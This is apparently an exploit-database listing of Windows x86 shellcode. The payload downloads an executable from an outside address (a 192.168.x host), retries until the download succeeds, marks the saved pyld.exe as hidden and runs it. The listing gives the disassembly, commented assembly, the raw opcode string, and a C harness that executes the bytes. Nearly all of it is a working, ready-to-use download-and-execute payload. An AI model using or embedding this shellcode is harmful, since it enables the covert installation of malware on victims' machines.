Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode



EKU-ID: 5693 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-07-14 Verified: Verified


/*
    Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
    Date : 12-07-2016
    Author : Roziul Hasan Khan Shifat
    Tested on: Windows 7 x86
 
 
*/
 
/*
 
 
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx
 
00000023 <count>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <count>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <count>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <count>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   31 f6                   xor    %esi,%esi
  4d:   89 d6                   mov    %edx,%esi
  4f:   89 cf                   mov    %ecx,%edi
  51:   31 c0                   xor    %eax,%eax
  53:   50                      push   %eax
  54:   68 61 72 79 41          push   $0x41797261
  59:   68 4c 69 62 72          push   $0x7262694c
  5e:   68 4c 6f 61 64          push   $0x64616f4c
  63:   54                      push   %esp
  64:   51                      push   %ecx
  65:   ff d2                   call   *%edx
  67:   83 c4 0c                add    $0xc,%esp
  6a:   31 c9                   xor    %ecx,%ecx
  6c:   68 6c 6c 41 41          push   $0x41416c6c
  71:   88 4c 24 02             mov    %cl,0x2(%esp)
  75:   68 6f 6e 2e 64          push   $0x642e6e6f
  7a:   68 75 72 6c 6d          push   $0x6d6c7275
  7f:   54                      push   %esp
  80:   ff d0                   call   *%eax
  82:   83 c4 0c                add    $0xc,%esp
  85:   31 c9                   xor    %ecx,%ecx
  87:   68 65 41 42 42          push   $0x42424165
  8c:   88 4c 24 02             mov    %cl,0x2(%esp)
  90:   68 6f 46 69 6c          push   $0x6c69466f
  95:   68 6f 61 64 54          push   $0x5464616f
  9a:   68 6f 77 6e 6c          push   $0x6c6e776f
  9f:   68 55 52 4c 44          push   $0x444c5255
  a4:   54                      push   %esp
  a5:   50                      push   %eax
  a6:   ff d6                   call   *%esi
  a8:   83 c4 14                add    $0x14,%esp
  ab:   50                      push   %eax
 
000000ac <download>:
  ac:   58                      pop    %eax
  ad:   31 c9                   xor    %ecx,%ecx
  af:   51                      push   %ecx
  b0:   68 2e 65 78 65          push   $0x6578652e
  b5:   68 6d 70 6c 65          push   $0x656c706d
  ba:   68 30 2f 73 61          push   $0x61732f30
  bf:   68 36 2e 31 33          push   $0x33312e36
  c4:   68 36 38 2e 38          push   $0x382e3836
  c9:   68 39 32 2e 31          push   $0x312e3239
  ce:   68 3a 2f 2f 31          push   $0x312f2f3a
  d3:   68 68 74 74 70          push   $0x70747468
  d8:   54                      push   %esp
  d9:   59                      pop    %ecx
  da:   31 db                   xor    %ebx,%ebx
  dc:   53                      push   %ebx
  dd:   68 2e 65 78 65          push   $0x6578652e
  e2:   68 70 79 6c 64          push   $0x646c7970
  e7:   54                      push   %esp
  e8:   5b                      pop    %ebx
  e9:   31 d2                   xor    %edx,%edx
  eb:   50                      push   %eax
  ec:   52                      push   %edx
  ed:   52                      push   %edx
  ee:   53                      push   %ebx
  ef:   51                      push   %ecx
  f0:   52                      push   %edx
  f1:   ff d0                   call   *%eax
  f3:   59                      pop    %ecx
  f4:   83 c4 2c                add    $0x2c,%esp
  f7:   31 d2                   xor    %edx,%edx
  f9:   39 d0                   cmp    %edx,%eax
  fb:   51                      push   %ecx
  fc:   75 ae                   jne    ac <download>
  fe:   5a                      pop    %edx
  ff:   31 d2                   xor    %edx,%edx
 101:   68 73 41 42 42          push   $0x42424173
 106:   88 54 24 02             mov    %dl,0x2(%esp)
 10a:   68 62 75 74 65          push   $0x65747562
 10f:   68 74 74 72 69          push   $0x69727474
 114:   68 69 6c 65 41          push   $0x41656c69
 119:   68 53 65 74 46          push   $0x46746553
 11e:   54                      push   %esp
 11f:   57                      push   %edi
 120:   ff d6                   call   *%esi
 122:   83 c4 14                add    $0x14,%esp
 125:   31 c9                   xor    %ecx,%ecx
 127:   51                      push   %ecx
 128:   68 2e 65 78 65          push   $0x6578652e
 12d:   68 70 79 6c 64          push   $0x646c7970
 132:   54                      push   %esp
 133:   59                      pop    %ecx
 134:   31 d2                   xor    %edx,%edx
 136:   83 c2 02                add    $0x2,%edx
 139:   52                      push   %edx
 13a:   51                      push   %ecx
 13b:   ff d0                   call   *%eax
 13d:   83 c4 08                add    $0x8,%esp
 140:   31 c9                   xor    %ecx,%ecx
 142:   68 78 65 63 41          push   $0x41636578
 147:   88 4c 24 03             mov    %cl,0x3(%esp)
 14b:   68 57 69 6e 45          push   $0x456e6957
 150:   54                      push   %esp
 151:   57                      push   %edi
 152:   ff d6                   call   *%esi
 154:   83 c4 08                add    $0x8,%esp
 157:   31 c9                   xor    %ecx,%ecx
 159:   51                      push   %ecx
 15a:   68 2e 65 78 65          push   $0x6578652e
 15f:   68 70 79 6c 64          push   $0x646c7970
 164:   54                      push   %esp
 165:   59                      pop    %ecx
 166:   31 d2                   xor    %edx,%edx
 168:   52                      push   %edx
 169:   51                      push   %ecx
 16a:   ff d0                   call   *%eax
 16c:   83 c4 08                add    $0x8,%esp
 16f:   31 c9                   xor    %ecx,%ecx
 171:   68 65 73 73 41          push   $0x41737365
 176:   88 4c 24 03             mov    %cl,0x3(%esp)
 17a:   68 50 72 6f 63          push   $0x636f7250
 17f:   68 45 78 69 74          push   $0x74697845
 184:   54                      push   %esp
 185:   57                      push   %edi
 186:   ff d6                   call   *%esi
 188:   ff d0                   call   *%eax
 
 
*/
 
 
 
/*
 
section .text
    global _start
_start:
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemoryOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address
;------------------------------------
 
mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_lfanew
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
xor edx,edx
 
count:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count
 
;---------------------------------------------
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
mov edx,[esi+edx*4]
add edx,ecx ;edx=GetProcAddress()
 
;-----------------------------------------
 
xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
 
;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
push esp
push ecx
 
call edx
 
;------------------------
add esp,12
;-----------------------------
 
;LoadLibraryA("urlmon.dll")
xor ecx,ecx
 
push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275
 
push esp
call eax
 
;-----------------------
 
add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255
 
push esp
push eax
call esi
 
;------------------------
add esp,20
push eax
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx
 
;-----------------------------
;change it to file url
 
push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------
 
 
push esp
pop ecx ;url http://192.168.86.130/sample.exe
 
xor ebx,ebx
push ebx
 
;------------------------
;save-as file name (no need to change it; change it if you want)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as
 
xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx
 
call eax
 
;-------------------------
 
pop ecx
add esp,44
xor edx,edx
cmp eax,edx
push ecx
jnz download ;if the download fails, retry continuously
;------------------
pop edx
 
;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx
 
 
push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553
 
push esp
push edi
 
call esi
 
;--------------------------------
 
add esp,20 ;you must adjust the stack or it will crash
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
 
push esp
pop ecx
 
xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN
 
push edx
push ecx
 
call eax
 
;-------------------
 
add esp,8
;---------------------------
 
;finding address of WinExec()
xor ecx,ecx
 
push 0x41636578
mov [esp+3],byte cl
push 0x456e6957
 
push esp
push edi
call esi
 
;----------------------
 
add esp,8
 
;------------------------
;calling WinExec("pyld.exe",0)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
 
push esp
pop ecx
 
xor edx,edx
push edx
push ecx
 
call eax
;-------------------------
 
add esp,8
;-----------------------------
 
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
push esp
push edi
 
call esi
 
;--------------
call eax
 
 
 
*/
 
#include<stdio.h>
#include<string.h>
 
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";
 
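/*
 * Test harness: prints the length of the byte array above, then transfers
 * control to it by casting the array to a function pointer.
 *
 * The original declared main() with an implicit int return type, which is
 * invalid since C99 and rejected by current compilers; the signature is
 * now explicit and the function returns 0 on the (unexpected) fall-through
 * path. Control normally never comes back here: the listing above ends in
 * ExitProcess(). Because the bytes live in a plain data array, the call
 * can only run them if that data segment is executable — on a build where
 * it is not (DEP/NX enforced), the indirect call faults instead.
 */
int main(void)
{
    printf("shellcode length %ld\n", (long)strlen(shellcode));
    (*(int (*)(void))shellcode)();
    return 0;
}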